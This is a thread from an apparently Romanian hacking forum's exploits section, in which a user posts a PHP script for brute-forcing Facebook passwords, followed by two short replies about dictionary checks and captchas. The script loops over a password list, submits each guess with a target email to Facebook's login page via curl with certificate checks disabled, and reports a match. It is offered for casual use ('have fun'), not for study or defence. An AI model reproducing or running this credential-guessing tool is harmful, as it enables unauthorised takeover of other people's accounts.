Jump to content
bebemic

facebook php bruteforce

By bebemic, in Exploituri

Recommended Posts

bebemic Newbie

bebemic

Posted
Posted

have fun..daca mai e postat scuze....


###############################
# Face Book Brute Forcer
################################
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - Password found :$line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :  
$line</font><br>";}
}
?>


pr00f Newbie

pr00f

Posted
Posted
Ati bagat $dictionary ="dictionary.txt"; // need dictionary to password list ?

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}

Verific? el dac? exist? dic?ionarul.

Oricum, pe fb nu trebuia sa bagi captcha dupa x încerc?ri e?uate, pân? ?i pe varianta de mobile ?

Silviu Rookie

Silviu

Posted
Posted 
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}

Verific? el dac? exist? dic?ionarul.

Oricum, pe fb nu trebuia sa bagi captcha dupa x încerc?ri e?uate, pân? ?i pe varianta de mobile ?

Aaa nu m-am uitat in tot codul. Cred ca trebuie sa bagi captcha dupa sa zici si 20 de incercari.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...